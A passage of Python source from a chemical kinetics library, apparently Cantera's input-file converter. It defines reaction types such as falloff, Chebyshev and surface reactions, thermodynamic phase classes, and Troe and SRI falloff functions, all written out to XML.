self._rxnphase = ph
mindim = ph._dim
break
if nm == -999:
raise CTI_Error("species "+s+" not found")
else:
# If no phases are defined, assume all reactants are in bulk
# phases
nm = 1
nl = -3
self.mdim += nm*ns
self.ldim += nl*ns
p.addComment(" reaction "+id+" ")
r = p.addChild('reaction')
r['id'] = id
if self.rev:
r['reversible'] = 'yes'
else:
r['reversible'] = 'no'
if 'duplicate' in self._options:
r['duplicate'] = 'yes'
if 'negative_A' in self._options:
r['negative_A'] = 'yes'
if 'negative_orders' in self._options:
r['negative_orders'] = 'yes'
if 'nonreactant_orders' in self._options:
r['nonreactant_orders'] = 'yes'
ee = self._e.replace('<','[').replace('>',']')
r.addChild('equation',ee)
if self._order:
for osp in self._rxnorder:
o = r.addChild('order',self._rxnorder[osp])
o['species'] = osp
# adjust the moles and length powers based on the dimensions of
# the rate of progress (moles/length^2 or moles/length^3)
if self._type == 'surface':
self.mdim += -1
self.ldim += 2
p = self._dims[:3]
if p[0] != 0 or p[1] != 0 or p[2] > 1:
raise CTI_Error(self._e +'\nA surface reaction may contain at most '+
'one surface phase.')
elif self._type == 'edge':
self.mdim += -1
self.ldim += 1
p = self._dims[:2]
if p[0] != 0 or p[1] > 1:
raise CTI_Error(self._e+'\nAn edge reaction may contain at most '+
'one edge phase.')
else:
self.mdim += -1
self.ldim += 3
# add the reaction type as an attribute if it has been specified.
if self._type:
r['type'] = self._type
# The default rate coefficient type is Arrhenius. If the rate
# coefficient has been specified as a sequence of three
# numbers, then create a new Arrhenius instance for it;
# otherwise, just use the supplied instance.
nm = ''
kfnode = r.addChild('rateCoeff')
if self._type == '':
self._kf = [self._kf]
elif self._type == 'surface':
self._kf = [self._kf]
elif self._type == 'edge':
self._kf = [self._kf]
elif self._type == 'threeBody':
self._kf = [self._kf]
self.mdim += 1
self.ldim -= 3
elif self._type == 'chebyshev':
self._kf = []
if self._type == 'edge':
if self._beta > 0:
electro = kfnode.addChild('electrochem')
electro['beta'] = repr(self._beta)
for kf in self._kf:
if isinstance(kf, rate_expression):
k = kf
else:
k = Arrhenius(A = kf[0], b = kf[1], E = kf[2])
if isinstance(kf, stick):
kf.gas_species = self._igspecies
kf.rxn_phase = self._rxnphase
k.unit_factor = self.unit_factor()
k.build(kfnode, name=nm)
if self._type == 'falloff':
# set values for low-pressure rate coeff if falloff rxn
self.mdim += 1
self.ldim -= 3
nm = 'k0'
elif self._type == 'chemAct':
# set values for high-pressure rate coeff if this is a
# chemically activated reaction
self.mdim -= 1
self.ldim += 3
nm = 'kHigh'
rstr = ' '.join('%s:%s' % item for item in self._r.items())
pstr = ' '.join('%s:%s' % item for item in self._p.items())
r.addChild('reactants',rstr)
r.addChild('products', pstr)
return r
#-------------------
class three_body_reaction(reaction):
"""
A three-body reaction.
"""
def __init__(self,
equation = '',
kf = None,
efficiencies = '',
id = '',
options = []
):
"""
:param equation:
A string specifying the chemical equation. The reaction can be
written in either the association or dissociation directions, and
may be reversible or irreversible.
:param kf:
The rate coefficient for the forward direction. If a sequence of
three numbers is given, these will be interpreted as [A, b, E] in
the modified Arrhenius function.
:param efficiencies:
A string specifying the third-body collision efficiencies.
The efficiencies for unspecified species are set to 1.0.
:param id:
An optional identification string. If omitted, it defaults to a
four-digit numeric string beginning with 0001 for the first
reaction in the file.
:param options: Processing options, as described in
:ref:`sec-reaction-options`.
"""
reaction.__init__(self, equation, kf, id, '', options)
self._type = 'threeBody'
self._effm = 1.0
self._eff = efficiencies
# clean up reactant and product lists
for r in list(self._r.keys()):
if r == 'M' or r == 'm':
del self._r[r]
for p in list(self._p.keys()):
if p == 'M' or p == 'm':
del self._p[p]
def build(self, p):
r = reaction.build(self, p)
if r == 0: return
kfnode = r.child('rateCoeff')
if self._eff:
eff = kfnode.addChild('efficiencies',self._eff)
eff['default'] = repr(self._effm)
class pdep_reaction(reaction):
""" Base class for falloff_reaction and chemically_activated_reaction """
def clean_up_reactants_products(self):
del self._r['(+']
del self._p['(+']
if 'M)' in self._r:
del self._r['M)']
del self._p['M)']
elif 'm)' in self._r:
del self._r['m)']
del self._p['m)']
else:
for r in list(self._r.keys()):
if r[-1] == ')' and r.find('(') < 0:
species = r[:-1]
if self._eff:
raise CTI_Error('(+ '+species+') and '+self._eff+' cannot both be specified')
self._eff = species+':1.0'
self._effm = 0.0
del self._r[r]
del self._p[r]
def build(self, p):
r = reaction.build(self, p)
if r == 0: return
kfnode = r.child('rateCoeff')
if self._eff and self._effm >= 0.0:
eff = kfnode.addChild('efficiencies',self._eff)
eff['default'] = repr(self._effm)
if self._falloff:
self._falloff.build(kfnode)
class falloff_reaction(pdep_reaction):
""" A gas-phase falloff reaction. """
def __init__(self, equation, kf0, kf,
efficiencies='', falloff=None, id='', options=[]):
"""
:param equation:
A string specifying the chemical equation.
:param kf:
The rate coefficient for the forward direction in the high-pressure
limit. If a sequence of three numbers is given, these will be
interpreted as [A, b, E] in the modified Arrhenius function.
:param kf0:
The rate coefficient for the forward direction in the low-pressure
limit. If a sequence of three numbers is given, these will be
interpreted as [A, b, E] in the modified Arrhenius function.
:param efficiencies:
A string specifying the third-body collision efficiencies. The
efficiency for unspecified species is set to 1.0.
:param falloff:
An embedded entry specifying a falloff function. If omitted, a
unity falloff function (Lindemann form) will be used.
:param id:
An optional identification string. If omitted, it defaults to a
four-digit numeric string beginning with 0001 for the first
reaction in the file.
:param options:
Processing options, as described in :ref:`sec-reaction-options`.
"""
kf2 = (kf, kf0)
reaction.__init__(self, equation, kf2, id, '', options)
self._type = 'falloff'
# use a Lindemann falloff function by default
self._falloff = falloff
if self._falloff == None:
self._falloff = Lindemann()
self._effm = 1.0
self._eff = efficiencies
self.clean_up_reactants_products()
class chemically_activated_reaction(pdep_reaction):
""" A gas-phase, chemically activated reaction. """
def __init__(self, equation, kLow, kHigh,
efficiencies='', falloff=None, id='', options=[]):
"""
:param equation:
A string specifying the chemical equation.
:param kLow:
The rate coefficient for the forward direction in the low-pressure
limit. If a sequence of three numbers is given, these will be
interpreted as [A, b, E] in the modified Arrhenius function.
:param kHigh:
The rate coefficient for the forward direction in the high-pressure
limit. If a sequence of three numbers is given, these will be
interpreted as [A, b, E] in the modified Arrhenius function.
:param efficiencies:
A string specifying the third-body collision efficiencies. The
efficiency for unspecified species is set to 1.0.
:param falloff:
An embedded entry specifying a falloff function. If omitted, a
unity falloff function (Lindemann form) will be used.
:param id:
An optional identification string. If omitted, it defaults to a
four-digit numeric string beginning with 0001 for the first
reaction in the file.
:param options:
Processing options, as described in :ref:`sec-reaction-options`.
"""
reaction.__init__(self, equation, (kLow, kHigh), id, '', options)
self._type = 'chemAct'
# use a Lindemann falloff function by default
self._falloff = falloff
if self._falloff == None:
self._falloff = Lindemann()
self._effm = 1.0
self._eff = efficiencies
self.clean_up_reactants_products()
class pdep_arrhenius(reaction):
"""
Pressure-dependent rate calculated by interpolating between Arrhenius
expressions at different pressures.
:param equation:
A string specifying the chemical equation.
:param args:
Each additional argument is a sequence of four elements specifying the
pressure and the Arrhenius parameters at that pressure.
"""
def __init__(self, equation='', *args, **kwargs):
self.pressures = []
self.arrhenius = []
for p, A, b, Ea in args:
self.pressures.append(p)
self.arrhenius.append((A, b, Ea))
reaction.__init__(self, equation, self.arrhenius, **kwargs)
self._type = 'plog'
def build(self, p):
r = reaction.build(self, p)
kfnode = r.child('rateCoeff')
for i,c in enumerate(kfnode.children()):
assert c.name() == 'Arrhenius'
addFloat(c, 'P', self.pressures[i])
class chebyshev_reaction(reaction):
"""
Pressure-dependent rate calculated in terms of a bivariate Chebyshev
polynomial.
:param equation:
A string specifying the chemical equation.
:param Tmin:
The minimum temperature at which the rate expression is defined
:param Tmax:
the maximum temperature at which the rate expression is defined
:param Pmin:
The minimum pressure at which the rate expression is defined
:param Pmax:
The maximum pressure at which the rate expression is defined
:param coeffs:
A 2D array of the coefficients defining the rate expression. For a
polynomial with M points in temperature and N points in pressure, this
should be a list of M lists each with N elements.
"""
def __init__(self, equation='', Tmin=300.0, Tmax=2500.0,
Pmin=(0.001, 'atm'), Pmax=(100.0, 'atm'),
coeffs=[[]], **kwargs):
reaction.__init__(self, equation, **kwargs)
self._type = 'chebyshev'
self.Pmin = Pmin
self.Pmax = Pmax
self.Tmin = Tmin
self.Tmax = Tmax
self.coeffs = coeffs
# clean up reactant and product lists
if '(+' in self._r:
del self._r['(+']
del self._p['(+']
if 'M)' in self._r:
del self._r['M)']
del self._p['M)']
if 'm)' in self._r:
del self._r['m)']
del self._p['m)']
def build(self, p):
r = reaction.build(self, p)
kfnode = r.child('rateCoeff')
addFloat(kfnode, 'Tmin', self.Tmin)
addFloat(kfnode, 'Tmax', self.Tmax)
addFloat(kfnode, 'Pmin', self.Pmin)
addFloat(kfnode, 'Pmax', self.Pmax)
self.coeffs[0][0] += math.log10(self.unit_factor());
lines = []
for line in self.coeffs:
lines.append(', '.join('{0:12.5e}'.format(val)
for val in line))
coeffNode = kfnode.addChild('floatArray', ',\n'.join(lines))
coeffNode['name'] = 'coeffs'
coeffNode['degreeT'] = str(len(self.coeffs))
coeffNode['degreeP'] = str(len(self.coeffs[0]))
class surface_reaction(reaction):
"""
A heterogeneous chemical reaction with pressure-independent rate
coefficient and mass-action kinetics.
"""
def __init__(self, equation='', kf=None, id='', order='', options=[]):
"""
:param equation:
A string specifying the chemical equation.
:param kf:
The rate coefficient for the forward direction. If a sequence of
three numbers is given, these will be interpreted as [A, b, E] in
the modified Arrhenius function.
:param sticking_prob:
The reactive sticking probability for the forward direction. This
can only be specified if there is only one bulk-phase reactant and
it belongs to an ideal gas phase. If a sequence of three numbers is
given, these will be interpreted as [A, b, E] in the modified
Arrhenius function.
:param id:
An optional identification string. If omitted, it defaults to a
four-digit numeric string beginning with 0001 for the first
reaction in the file.
:param options:
Processing options, as described in :ref:`sec-reaction-options`.
"""
reaction.__init__(self, equation, kf, id, order, options)
self._type = 'surface'
class edge_reaction(reaction):
def __init__(self,
equation = '',
kf = None,
id = '',
order = '',
beta = 0.0,
options = []):
reaction.__init__(self, equation, kf, id, order, options)
self._type = 'edge'
self._beta = beta
#--------------
class state(object):
"""
An embedded entry that specifies the thermodynamic state of a phase
or interface.
"""
def __init__(self,
temperature = None,
pressure = None,
mole_fractions = None,
mass_fractions = None,
density = None,
coverages = None,
solute_molalities = None):
"""
:param temperature:
The temperature.
:param pressure:
The pressure.
:param density:
The density. Cannot be specified if the phase is incompressible.
:param mole_fractions:
A string specifying the species mole fractions. Unspecified species
are set to zero.
:param mass_fractions:
A string specifying the species mass fractions. Unspecified species
are set to zero.
:param coverages:
A string specifying the species coverages. Unspecified species are
set to zero. Can only be specified for interfaces.
"""
self._t = temperature
self._p = pressure
self._rho = density
self._x = mole_fractions
self._y = mass_fractions
self._c = coverages
self._m = solute_molalities
def build(self, ph):
st = ph.addChild('state')
if self._t: addFloat(st, 'temperature', self._t, defunits = 'K')
if self._p: addFloat(st, 'pressure', self._p, defunits = _upres)
if self._rho: addFloat(st, 'density', self._rho, defunits = _umass+'/'+_ulen+'3')
if self._x: st.addChild('moleFractions', self._x)
if self._y: st.addChild('massFractions', self._y)
if self._c: st.addChild('coverages', self._c)
if self._m: st.addChild('soluteMolalities', self._m)
class phase(object):
"""Base class for phases of matter."""
def __init__(self,
name = '',
dim = 3,
elements = '',
species = '',
note = '',
reactions = 'none',
initial_state = None,
options = []):
"""
:param name:
A string to identify the phase. Must be unique among the phase
names within the file.
:param elements:
The elements. A string of element symbols.
:param species:
The species. A string or sequence of strings in the format
described in :ref:`sec-defining-species`.
:param note:
A user-defined comment. Not evaluated by Cantera itself.
:param reactions:
The homogeneous reactions. If omitted, no reactions will be
included. A string or sequence of strings in the format described
in :ref:`sec-declaring-reactions`. This field is not allowed for
stoichiometric_solid and stoichiometric_liquid entries.
:param kinetics:
The kinetics model. Optional; if omitted, the default model for the
phase type will be used.
:param transport:
The transport property model. Optional. If omitted, transport
property calculation will be disabled.
:param initial_state:
Initial thermodynamic state, specified with an embedded state entry.
:param options:
Special processing options. Optional.
"""
self._name = name
self._dim = dim
self._el = elements
self._sp = []
self._rx = []
self._comment = note
if isinstance(options, str):
self._options = [options]
else:
self._options = options
self.debug = 0
if 'debug' in options:
self.debug = 1
#--------------------------------
# process species
#--------------------------------
# if a single string is entered, make it a list
if isinstance(species, str):
self._species = [species]
else:
self._species = species
self._skip = 0
# dictionary of species names
self._spmap = {}
# for each species string, check whether or not the species
# are imported or defined locally. If imported, the string
# contains a colon (:)
for sp in self._species:
icolon = sp.find(':')
if icolon > 0:
#datasrc, spnames = sp.split(':')
datasrc = sp[:icolon].strip()
spnames = sp[icolon+1:]
self._sp.append((datasrc+'.xml', spnames))
else:
spnames = sp
self._sp.append(('', spnames))
# strip the commas, and make the list of species names
# 10/31/03: commented out the next line, so that species names may contain commas
#sptoks = spnames.replace(',',' ').split()
sptoks = spnames.split()
for s in sptoks:
# check for stray commas
if s != ',':
if s[0] == ',': s = s[1:]
if s[-1] == ',': s = s[:-1]
if s != 'all' and s in self._spmap:
raise CTI_Error('Multiply-declared species '+s+' in phase '+self._name)
self._spmap[s] = self._dim
self._rxns = reactions
# check that species have been declared
if len(self._spmap) == 0:
raise CTI_Error('No species declared for phase '+self._name)
# and that only one species is declared if it is a pure phase
if self.is_pure() and len(self._spmap) > 1:
raise CTI_Error('Stoichiometric phases must declare exactly one species, \n'+
'but phase '+self._name+' declares '+str(len(self._spmap))+'.')
self._initial = initial_state
# add this phase to the global phase list
global _phases
_phases.append(self)
def is_ideal_gas(self):
"""True if the entry represents an ideal gas."""
return 0
def is_pure(self):
return 0
def has_species(self, s):
"""Return 1 is a species with name 's' belongs to the phase,
or 0 otherwise."""
if s in self._spmap: return 1
return 0
def conc_dim(self):
"""Concentration dimensions. Used in computing the units for reaction
rate coefficients."""
return (1, -self._dim)
def buildrxns(self, p):
if isinstance(self._rxns, str):
self._rxns = [self._rxns]
# for each reaction string, check whether or not the reactions
# are imported or defined locally. If imported, the string
# contains a colon (:)
for r in self._rxns:
icolon = r.find(':')
if icolon > 0:
#datasrc, rnum = r.split(':')
datasrc = r[:icolon].strip()
rnum = r[icolon+1:]
self._rx.append((datasrc+'.xml', rnum))
else:
rnum = r
self._rx.append(('', rnum))
for r in self._rx:
datasrc = r[0]
ra = p.addChild('reactionArray')
ra['datasrc'] = datasrc+'#reaction_data'
rk = None
if 'skip_undeclared_species' in self._options:
rk = ra.addChild('skip')
rk['species'] = 'undeclared'
if 'skip_undeclared_third_bodies' in self._options:
if not rk:
rk = ra.addChild('skip')
rk['third_bodies'] = 'undeclared'
rtoks = r[1].split()
if rtoks[0] != 'all':
i = ra.addChild('include')
#i['prefix'] = 'reaction_'
i['min'] = rtoks[0]
if len(rtoks) > 2 and (rtoks[1] == 'to' or rtoks[1] == '-'):
i['max'] = rtoks[2]
else:
i['max'] = rtoks[0]
def build(self, p):
p.addComment(' phase '+self._name+' ')
ph = p.addChild('phase')
ph['id'] = self._name
ph['dim'] = repr(self._dim)
# ------- error tests -------
#err = ph.addChild('validation')
#err.addChild('duplicateReactions','halt')
#err.addChild('thermo','warn')
e = ph.addChild('elementArray',self._el)
e['datasrc'] = 'elements.xml'
for s in self._sp:
datasrc, names = s
sa = ph.addChild('speciesArray',names)
sa['datasrc'] = datasrc+'#species_data'
if 'skip_undeclared_elements' in self._options:
sk = sa.addChild('skip')
sk['element'] = 'undeclared'
if self._rxns != 'none':
self.buildrxns(ph)
#self._eos.build(ph)
if self._initial:
self._initial.build(ph)
if self._comment:
ph.addChild('note',self._comment)
thermo = ph.addChild('thermo')
if 'allow_discontinuous_thermo' in self._options:
thermo['allow_discontinuities'] = 'true'
return ph
class ideal_gas(phase):
"""An ideal gas mixture."""
def __init__(self,
name = '',
elements = '',
species = '',
note = '',
reactions = 'none',
kinetics = 'GasKinetics',
transport = 'None',
initial_state = None,
options = []):
"""
The parameters correspond to those of :class:`.phase`, with the
following modifications:
:param kinetics:
The kinetics model. Usually this field is omitted, in which case
kinetics model GasKinetics, appropriate for reactions in ideal gas
mixtures, is used.
:param transport:
The transport property model. One of the strings ``'none'``,
``'multi'``, or ``'mix'``. Default: ``'none'``.
"""
phase.__init__(self, name, 3, elements, species, note, reactions,
initial_state, options)
self._pure = 0
self._kin = kinetics
self._tr = transport
if self.debug:
_printerr('Read ideal_gas entry '+self._name)
try:
_printerr('in file '+__name__)
except:
pass
def build(self, p):
ph = phase.build(self, p)
ph.child('thermo')['model'] = 'IdealGas'
k = ph.addChild("kinetics")
k['model'] = self._kin
t = ph.addChild('transport')
t['model'] = self._tr
def is_ideal_gas(self):
return 1
class stoichiometric_solid(phase):
"""
A solid compound or pure element. Stoichiometric solid phases contain
exactly one species, which always has unit activity. The solid is assumed
to have constant density. Therefore the rates of reactions involving these
phases do not contain any concentration terms for the (one) species in the
phase, since the concentration is always the same."""
def __init__(self,
name = '',
elements = '',
species = '',
note = '',
density = None,
transport = 'None',
initial_state = None,
options = []):
"""
See :class:`.phase` for descriptions of the parameters.
"""
phase.__init__(self, name, 3, elements, species, note, 'none',
initial_state, options)
self._dens = density
self._pure = 1
if self._dens is None:
raise CTI_Error('density must be specified.')
self._tr = transport
def conc_dim(self):
"""A stoichiometric solid always has unit activity, so the
generalized concentration is 1 (dimensionless)."""
return (0,0)
def build(self, p):
ph = phase.build(self, p)
e = ph.child('thermo')
e['model'] = 'StoichSubstance'
addFloat(e, 'density', self._dens, defunits = _umass+'/'+_ulen+'3')
if self._tr:
t = ph.addChild('transport')
t['model'] = self._tr
k = ph.addChild("kinetics")
k['model'] = 'none'
class stoichiometric_liquid(stoichiometric_solid):
"""
An incompressible stoichiometric liquid. Currently, there is no
distinction between stoichiometric liquids and solids.
"""
def __init__(self,
name = '',
elements = '',
species = '',
note = '',
density = -1.0,
transport = 'None',
initial_state = None,
options = []):
"""
See :class:`.phase` for descriptions of the parameters.
"""
stoichiometric_solid.__init__(self, name, elements,
species, note, density, transport,
initial_state, options)
class metal(phase):
"""A metal."""
def __init__(self,
name = '',
elements = '',
species = '',
note = '',
density = -1.0,
transport = 'None',
initial_state = None,
options = []):
phase.__init__(self, name, 3, elements, species, note, 'none',
initial_state, options)
self._dens = density
self._pure = 0
self._tr = transport
def conc_dim(self):
return (0,0)
def build(self, p):
ph = phase.build(self, p)
e = ph.child("thermo")
e['model'] = 'Metal'
addFloat(e, 'density', self._dens, defunits = _umass+'/'+_ulen+'3')
if self._tr:
t = ph.addChild('transport')
t['model'] = self._tr
k = ph.addChild("kinetics")
k['model'] = 'none'
class semiconductor(phase):
"""A semiconductor."""
def __init__(self,
name = '',
elements = '',
species = '',
note = '',
density = -1.0,
bandgap = 1.0 * eV,
effectiveMass_e = 1.0 * ElectronMass,
effectiveMass_h = 1.0 * ElectronMass,
transport = 'None',
initial_state = None,
options = []):
phase.__init__(self, name, 3, elements, species, note, 'none',
initial_state, options)
self._dens = density
self._pure = 0
self._tr = transport
self._emass = effectiveMass_e
self._hmass = effectiveMass_h
self._bandgap = bandgap
def conc_dim(self):
return (1,-3)
def build(self, p):
ph = phase.build(self, p)
e = ph.child("thermo")
e['model'] = 'Semiconductor'
addFloat(e, 'density', self._dens, defunits = _umass+'/'+_ulen+'3')
addFloat(e, 'effectiveMass_e', self._emass, defunits = _umass)
addFloat(e, 'effectiveMass_h', self._hmass, defunits = _umass)
addFloat(e, 'bandgap', self._bandgap, defunits = 'eV')
if self._tr:
t = ph.addChild('transport')
t['model'] = self._tr
k = ph.addChild("kinetics")
k['model'] = 'none'
class incompressible_solid(phase):
"""An incompressible solid."""
def __init__(self,
name = '',
elements = '',
species = '',
note = '',
density = None,
transport = 'None',
initial_state = None,
options = []):
phase.__init__(self, name, 3, elements, species, note, 'none',
initial_state, options)
self._dens = density
self._pure = 0
if self._dens is None:
raise CTI_Error('density must be specified.')
self._tr = transport
def conc_dim(self):
return (1,-3)
def build(self, p):
ph = phase.build(self, p)
e = ph.child("thermo")
e['model'] = 'Incompressible'
addFloat(e, 'density', self._dens, defunits = _umass+'/'+_ulen+'3')
if self._tr:
t = ph.addChild('transport')
t['model'] = self._tr
k = ph.addChild("kinetics")
k['model'] = 'none'
class lattice(phase):
def __init__(self,
name = '',
elements = '',
species = '',
note = '',
reactions = 'none',
transport = 'None',
initial_state = None,
options = [],
site_density = None,
vacancy_species = ''):
phase.__init__(self, name, 3, elements, species, note, 'none',
initial_state, options)
self._tr = transport
self._n = site_density
self._vac = vacancy_species
self._species = species
if name == '':
raise CTI_Error('sublattice name must be specified')
if species == '':
raise CTI_Error('sublattice species must be specified')
if site_density is None:
raise CTI_Error('sublattice '+name
+' site density must be specified')
def build(self,p, visible = 0):
#if visible == 0:
# return
ph = phase.build(self, p)
e = ph.child('thermo')
e['model'] = 'Lattice'
addFloat(e, 'site_density', self._n, defunits = _umol+'/'+_ulen+'3')
if self._vac:
e.addChild('vacancy_species',self._vac)
if self._tr:
t = ph.addChild('transport')
t['model'] = self._tr
k = ph.addChild("kinetics")
k['model'] = 'none'
class lattice_solid(phase):
"""A solid crystal consisting of one or more sublattices."""
def __init__(self,
name = '',
elements = '',
species = '',
note = '',
lattices = [],
transport = 'None',
initial_state = None,
options = []):
# find elements
elist = []
for lat in lattices:
e = lat._el.split()
for el in e:
if not el in elist:
elist.append(el)
elements = ' '.join(elist)
# find species
slist = []
for lat in lattices:
_sp = ""
for spp in lat._species:
_sp += spp
s = _sp.split()
for sp in s:
if not sp in slist:
slist.append(sp)
species = ' '.join(slist)
phase.__init__(self, name, 3, elements, species, note, 'none',
initial_state, options)
self._lattices = lattices
if lattices == []:
raise CTI_Error('One or more sublattices must be specified.')
self._pure = 0
self._tr = transport
def conc_dim(self):
return (0,0)
def build(self, p):
ph = phase.build(self, p)
e = ph.child("thermo")
e['model'] = 'LatticeSolid'
if self._lattices:
lat = e.addChild('LatticeArray')
for n in self._lattices:
n.build(lat, visible = 1)
if self._tr:
t = ph.addChild('transport')
t['model'] = self._tr
k = ph.addChild("kinetics")
k['model'] = 'none'
class liquid_vapor(phase):
"""A fluid with a complete liquid/vapor equation of state.
This entry type selects one of a set of predefined fluids with
built-in liquid/vapor equations of state. The substance_flag
parameter selects the fluid. See purefluids.py for the usage
of this entry type."""
def __init__(self,
name = '',
elements = '',
species = '',
note = '',
substance_flag = 0,
initial_state = None,
options = []):
phase.__init__(self, name, 3, elements, species, note, 'none',
initial_state, options)
self._subflag = substance_flag
self._pure = 1
def conc_dim(self):
return (0,0)
def build(self, p):
ph = phase.build(self, p)
e = ph.child("thermo")
e['model'] = 'PureFluid'
e['fluid_type'] = repr(self._subflag)
k = ph.addChild("kinetics")
k['model'] = 'none'
class RedlichKwongMFTP(phase):
"""A multi-component fluid model for non-ideal gas fluids.
"""
def __init__(self,
name = '',
elements = '',
species = '',
note = '',
reactions = 'none',
kinetics = 'GasKinetics',
initial_state = None,
activity_coefficients = None,
transport = 'None',
options = []):
phase.__init__(self,name, 3, elements, species, note, reactions,
initial_state,options)
self._pure = 0
self._kin = kinetics
self._tr = transport
self._activityCoefficients = activity_coefficients
def build(self, p):
ph = phase.build(self,p)
e = ph.child("thermo")
e['model'] = 'RedlichKwongMFTP'
if self._activityCoefficients:
a = e.addChild("activityCoefficients")
if isinstance(self._activityCoefficients, activityCoefficients):
self._activityCoefficients.build(a)
else:
na = len(self._activityCoefficients)
for n in range(na):
self._activityCoefficients[n].build(a)
if self._tr:
t = ph.addChild('transport')
t['model'] = self._tr
if self._kin:
k = ph.addChild("kinetics")
k['model'] = self._kin
class redlich_kwong(phase):
"""A fluid with a complete liquid/vapor equation of state.
This entry type selects one of a set of predefined fluids with
built-in liquid/vapor equations of state. The substance_flag
parameter selects the fluid. See purefluids.py for the usage
of this entry type."""
def __init__(self,
name = '',
elements = '',
species = '',
note = '',
substance_flag = 7,
initial_state = None,
Tcrit = 1.0,
Pcrit = 1.0,
options = []):
phase.__init__(self, name, 3, elements, species, note, 'none',
initial_state, options)
self._subflag = 7
self._pure = 1
self._tc = 1
self._pc = 1
def conc_dim(self):
return (0,0)
def build(self, p):
ph = phase.build(self, p)
e = ph.child("thermo")
e['model'] = 'PureFluid'
e['fluid_type'] = repr(self._subflag)
addFloat(e, 'Tc', self._tc, defunits = "K")
addFloat(e, 'Pc', self._pc, defunits = "Pa")
addFloat(e, 'MolWt', self._mw, defunits = _umass+"/"+_umol)
ph.addChild("kinetics")
k['model'] = 'none'
class ideal_interface(phase):
"""A chemically-reacting ideal surface solution of multiple species."""
def __init__(self,
name = '',
elements = '',
species = '',
note = '',
reactions = 'none',
site_density = 0.0,
phases = [],
kinetics = 'Interface',
transport = 'None',
initial_state = None,
options = []):
"""
The parameters correspond to those of :class:`.phase`, with the
following modifications:
:param reactions:
The heterogeneous reactions at this interface. If omitted, no
reactions will be included. A string or sequence of strings in the
format described in :ref:`sec-declaring-reactions`.
:param site_density:
The number of adsorption sites per unit area.
:param phases:
A string listing the bulk phases that participate in reactions
at this interface.
"""
self._type = 'surface'
phase.__init__(self, name, 2, elements, species, note, reactions,
initial_state, options)
self._pure = 0
self._kin = kinetics
self._tr = transport
self._phases = phases
self._sitedens = site_density
def build(self, p):
ph = phase.build(self, p)
e = ph.child("thermo")
e['model'] = 'Surface'
addFloat(e, 'site_density', self._sitedens, defunits = _umol+'/'+_ulen+'2')
k = ph.addChild("kinetics")
k['model'] = self._kin
t = ph.addChild('transport')
t['model'] = self._tr
p = ph.addChild('phaseArray',self._phases)
def conc_dim(self):
return (1, -2)
class edge(phase):
"""A 1D boundary between two surface phases."""
def __init__(self,
name = '',
elements = '',
species = '',
note = '',
reactions = 'none',
site_density = 0.0,
phases = [],
kinetics = 'Edge',
transport = 'None',
initial_state = None,
options = []):
self._type = 'edge'
phase.__init__(self, name, 1, elements, species, note, reactions,
initial_state, options)
self._pure = 0
self._kin = kinetics
self._tr = transport
self._phases = phases
self._sitedens = site_density
def build(self, p):
ph = phase.build(self, p)
e = ph.child("thermo")
e['model'] = 'Edge'
addFloat(e, 'site_density', self._sitedens, defunits = _umol+'/'+_ulen)
k = ph.addChild("kinetics")
k['model'] = self._kin
t = ph.addChild('transport')
t['model'] = self._tr
p = ph.addChild('phaseArray',self._phases)
def conc_dim(self):
return (1, -1)
## class binary_salt_parameters:
## def __init__(self,
## cation = "",
## anion = "",
## beta0 = None,
## beta1 = None,
## beta2 = None,
## Cphi = None,
## Alpha1 = -1.0):
## self._cation = cation
## self._anion = anion
## self._beta0 = beta0
## self._beta1 = beta1
## self._Cphi = Cphi
## self._Alpha1 = Alpha1
## def build(self, a):
## s = a.addChild("binarySaltParameters")
## s["cation"] = self._cation
## s["anion"] = self._anion
## s.addChild("beta0", self._beta0)
## s.addChild("beta1", self._beta1)
## s.addChild("beta2", self._beta2)
## s.addChild("Cphi", self._Cphi)
## s.addChild("Alpha1", self._Alpha1)
## class theta_anion:
## def __init__(self,
## anions = None,
## theta = 0.0):
## self._anions = anions
## self._theta = theta
## def build(self, a):
## s = a.addChild("thetaAnion")
## s["anion1"] = self._anions[0]
## s["anion2"] = self._anions[1]
## s.addChild("Theta", self._theta)
## class psi_common_cation:
## def __init__(self,
## anions = None,
## cation = '',
## theta = 0.0,
## psi = 0.0):
## self._anions = anions
## self._cation = cation
## self._theta = theta
## self._psi = psi
## def build(self, a):
## s = a.addChild("psiCommonCation")
## s["anion1"] = self._anions[0]
## s["anion2"] = self._anions[1]
## s["cation"] = self._cation
## s.addChild("Theta", self._theta)
## s.addChild("Psi", self._psi)
## class psi_common_anion:
## def __init__(self,
## anion = '',
## cations = None,
## theta = 0.0,
## psi = 0.0):
## self._anion = anion
## self._cations = cations
## self._theta = theta
## self._psi = psi
## def build(self, a):
## s = a.addChild("psiCommonAnion")
## s["anion1"] = self._cations[0]
## s["anion2"] = self._cations[1]
## s["cation"] = self._anion
## s.addChild("Theta", self._theta)
## s.addChild("Psi", self._psi)
## class theta_cation:
## def __init__(self,
## cations = None,
## theta = 0.0):
## self._cations = cations
## self._theta = theta
## def build(self, a):
## s = a.addChild("thetaCation")
## s["cation1"] = self._anions[0]
## s["cation2"] = self._anions[1]
## s.addChild("Theta", self._theta)
## class pitzer:
## def __init__(self,
## temp_model = "",
## A_Debye = "",
## default_ionic_radius = -1.0,
## class electrolyte(phase):
## """An electrolye solution obeying the HMW model."""
## def __init__(self,
## name = '',
## elements = '',
## species = '',
## note = '',
## transport = 'None',
## initial_state = None,
## solvent = '',
## standard_concentration = '',
## activity_coefficients = None,
## options = []):
## phase.__init__(self, name, 3, elements, species, note, 'none',
## initial_state, options)
## self._pure = 0
## self._solvent = solvent
## self._stdconc = standard_concentration
## def conc_dim(self):
## return (1,-3)
## def build(self, p):
## ph = phase.build(self, p)
## e = ph.child("thermo")
## sc = e.addChild("standardConc")
## sc['model'] = self._stdconc
## e['model'] = 'HMW'
## e.addChild("activity_coefficients")
## addFloat(e, 'density', self._dens, defunits = _umass+'/'+_ulen+'3')
## if self._tr:
## t = ph.addChild('transport')
## t['model'] = self._tr
## k = ph.addChild("kinetics")
## k['model'] = 'none'
#-------------------------------------------------------------------
# falloff parameterizations
class Troe(object):
"""The Troe falloff function."""
def __init__(self, A = 0.0, T3 = 0.0, T1 = 0.0, T2 = -999.9):
"""
Parameters: *A*, *T3*, *T1*, *T2*. These must be entered as pure
numbers with no attached dimensions.
"""
if T2 != -999.9:
self._c = (A, T3, T1, T2)
else:
self._c = (A, T3, T1)
def build(self, p):
s = ''
for num in self._c:
s += '%g ' % num
f = p.addChild('falloff', s)
f['type'] = 'Troe'
class SRI(object):
""" The SRI falloff function."""
def __init__(self, A = 0.0, B = 0.0, C = 0.0, D = -999.9, E=-999.9):
"""
Parameters: *A*, *B*, *C*, *D*, *E*. These must be entered as
